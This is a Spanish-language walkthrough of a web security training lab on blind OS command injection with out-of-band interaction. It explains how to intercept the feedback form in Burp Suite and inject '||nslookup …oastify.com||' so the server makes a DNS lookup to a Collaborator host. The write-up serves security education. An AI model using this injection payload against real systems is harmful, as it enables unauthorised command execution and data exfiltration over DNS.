Blind OS command injection with out-of-band interaction writeup

Descripción

This lab contains a blind OS command injection vulnerability in the feedback function.

The application executes a shell command containing the user-supplied details. The command is executed asynchronously and has no effect on the application’s response. It is not possible to redirect output into a location that you can access. However, you can trigger out-of-band interactions with an external domain.

To solve the lab, exploit the blind OS command injection vulnerability to issue a DNS lookup to Burp Collaborator.

Blind OS command injection with out-of-band interaction writeup

Entramos en el laboratorio y vamos al apartado de ‘Submit feedback’. Allí rellenaremos el formulario y capturaremos el envío con el ‘Logger’ de Burp Suite:

Llevaremos esta petición al ‘Repeater’ con Ctrl + R o Clcik derecho -> Send to Repeater. También iremos a la pestaña ‘Collaborator’, pulsaremos ‘Get Started’ y ‘Copy to clipboard. Guardaremos el valor del portapapeles, en mi caso ‘t71ur9llp73catx24xew08cp2g87wxkm.oastify.com’.

En el ‘Repeater’, inyectaremos el comando ‘nslookup’ de la siguiente manera:

||nslookup t71ur9llp73catx24xew08cp2g87wxkm.oastify.com||

Codificaremos el comando como URL con Ctrl + U y enviaremos la petición. En el ‘Collaborator’, al pulsar ‘Poll now’, deberá aparecer la siguiente información:

Indicando que se nos ha hecho una petición de DNS lookup, completando así el laboratorio:

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *